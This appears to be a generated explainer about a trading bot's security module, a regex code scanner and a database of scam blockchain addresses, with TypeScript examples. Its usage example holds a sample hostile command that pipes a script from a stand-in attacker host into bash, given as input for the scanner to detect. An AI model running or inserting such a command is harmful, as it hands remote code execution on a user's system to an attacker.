How the CloddsBot Security Shield 75-Rule Code Scanner and Scam-Address Database Work
The CloddsBot Security Shield is a unified façade that employs a 75-rule static analyzer to detect malicious code patterns and maintains an in-memory database of 70+ known scam addresses to block threats in real-time.
The CloddsBot Security Shield serves as the central defense layer for the trading bot, aggregating multiple protective services behind a single interface defined in src/security/shield.ts. At its core, the shield integrates a 75-rule code scanner that performs static analysis on user inputs alongside a scam-address database that provides constant-time lookups of malicious blockchain addresses. Together, these components intercept high-risk operations before they can compromise user funds.
Security Shield Architecture
The Security Shield implements a façade pattern that coordinates five distinct protective modules. According to the CloddsBot source code, the façade defined in src/security/shield.ts exposes unified methods that delegate to specialized implementations:
src/security/code-scanner.ts– Houses the 75-rule regex engine for static analysissrc/security/scam-db.ts– Maintains the in-memoryMapof known malicious addressessrc/security/address-checker.ts– Wraps database lookups with on-chain heuristics (contract age, transaction volume)src/security/tx-validator.ts– Performs pre-trade validation (price sanity, slippage limits)src/security/sanitizer.ts– Detects zero-width characters, RTL tricks, and homoglyph attacks
Each module operates independently but reports through the central SecurityShield class, which tracks metrics like codeScans and threatsBlocked.
How the 75-Rule Code Scanner Works
Rule Categories and Severity Levels
The code scanner ships with 75 regular-expression-based rules organized into nine security categories including Shell Injection, Remote Code Execution, Obfuscation, and Scripting attacks. Each rule maps to a specific severity tier: low, medium, high, or critical. When scanCode(source) encounters a match, the rule's severity contributes to an aggregate CodeScanResult.level.
Scanning Execution Flow
When the shield's scanCode method (lines 55-60 of src/security/shield.ts) invokes the scanner, the engine iterates through all 75 regex patterns against the supplied source string. The implementation in src/security/code-scanner.ts evaluates each pattern sequentially, collecting matched rule identifiers and descriptions into a result object.
// Located in src/security/shield.ts lines 55-60
scanCode(source: string): CodeScanResult {
const result = scanCode(source); // Delegates to code-scanner.ts
this.metrics.codeScans++;
if (['high', 'critical'].includes(result.level)) {
this.metrics.threatsBlocked++;
}
return result;
}
The scanner returns a CodeScanResult containing the matched rule IDs, a descriptive threat summary, and the final severity level.
Threat Blocking Logic
The Security Shield treats high and critical severity results as active threats, incrementing the internal threatsBlocked counter when detected. Lower severity levels (low/medium) are logged for audit purposes but do not trigger automatic blocking, allowing the bot to continue operating while flagging suspicious patterns for review.
How the Scam-Address Database Works
In-Memory Storage Structure
The scam-address database is implemented as an ES6 Map<string, ScamEntry> where keys are normalized, lower-cased address strings. This structure provides O(1) constant-time lookup for any Solana (base58) or EVM (0x…) address check. The ScamEntry interface stores metadata including chain type, threat type (e.g., drainer, phishing), and a human-readable label.
Database Seeding Process
At module load time, src/security/scam-db.ts seeds the Map with 70+ entries sourced from public threat intelligence feeds including Etherscan, Mandiant, Check Point Research, and CertiK. The seeding uses a helper function that populates the database before any lookups occur:
// From src/security/scam-db.ts
seed(
'0x11cce5830e5753b9eec2c08a0be7cc6d3734c1bc',
'evm',
'drainer',
'scam-alert.eth'
);
Each seed() call inserts a verified malicious address with its classification metadata, ensuring the bot recognizes known threats immediately upon startup without requiring external API calls.
Address Verification Flow
The façade exposes isKnownScam(address) (referenced at lines 21-22 and implemented at lines 88-90 of src/security/shield.ts) which normalizes the input and queries the Map. If found, the function returns a ScamEntry object containing the threat type and label; otherwise, it returns null. This lookup occurs in microseconds due to the in-memory storage.
Integration with On-Chain Heuristics
While the scam database provides static threat intelligence, the address-checker.ts module enhances this with dynamic analysis. When SecurityShield.checkAddress() (lines 62-66) is called, the system combines the database lookup with on-chain heuristics such as contract deployment age and recent transaction volume to generate a comprehensive risk score and flag list (e.g., ['Known scam', 'New contract']).
Practical Implementation Example
The following example demonstrates initializing the shield and utilizing both the 75-rule scanner and scam-address database:
import { createSecurityShield } from './src/security/shield.js';
// Initialize with RPC endpoints for on-chain validation
const shield = createSecurityShield({
solanaRpcUrl: 'https://api.mainnet-beta.solana.com',
evmRpcUrl: 'https://eth-mainnet.g.alchemy.com/v2/your-key',
});
// 1. Scan user-provided code for malicious patterns
const suspiciousCode = `const { exec } = require('child_process');
exec('curl https://evil.com/script | bash');`;
const scanResult = shield.scanCode(suspiciousCode);
console.log('Threat level:', scanResult.level); // → 'high' or 'critical'
// 2. Check destination against the 70+ entry scam database
const targetAddress = '0x11cce5830e5753b9eec2c08a0be7cc6d3734c1bc';
const addressCheck = await shield.checkAddress(targetAddress, 'evm');
if (addressCheck.flags.includes('Known scam')) {
console.error('Blocked: Known drainer address detected');
}
// 3. Validate transaction parameters before signing
const tx = {
chain: 'evm',
to: targetAddress,
value: 1e18,
gasPrice: 50_000_000_000,
};
const validation = await shield.validateTx(tx);
if (!validation.allowed) {
throw new Error(`Transaction blocked: ${validation.reasons.join(', ')}`);
}
Summary
- The Security Shield acts as a centralized façade in
src/security/shield.ts, coordinating multiple defense modules through a unified API. - The 75-rule code scanner performs regex-based static analysis across nine threat categories, returning severity levels from
lowtocriticaland blockinghigh/criticalthreats immediately. - The scam-address database maintains an in-memory
Mapwith 70+ pre-seeded malicious addresses from authoritative sources like Etherscan and Mandiant, enabling constant-time lookups for both Solana and EVM addresses. - Both systems integrate with complementary validators (transaction sanity checks, on-chain heuristics) to provide defense-in-depth for CloddsBot users.
Frequently Asked Questions
What categories do the 75 code scanner rules cover?
The rules span nine security categories including Shell Injection, Remote Code Execution, Obfuscation, Scripting attacks, Serialization exploits, and Server-Side Request Forgery (SSRF). Each category contains multiple regex patterns targeting specific syntax signatures associated with that threat vector.
How many malicious addresses are pre-loaded in the scam database?
The database ships with 70+ verified malicious addresses seeded at runtime from threat intelligence feeds including Etherscan, Mandiant, Check Point Research, and CertiK. The in-memory Map structure allows instant lookup without external API latency.
Does the Security Shield support both Solana and EVM blockchains?
Yes. The scam-address database normalizes and stores both Solana base58 addresses and EVM 0x hex addresses within the same Map structure. The checkAddress method accepts a chain identifier parameter to apply appropriate validation rules for each ecosystem.
Where does the 75-rule scanner run in the CloddsBot codebase?
The scanner implementation resides in src/security/code-scanner.ts and is invoked through the façade's scanCode method (lines 55-60 of src/security/shield.ts). This design keeps the regex engine decoupled from the main bot logic while allowing the shield to track security metrics centrally.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →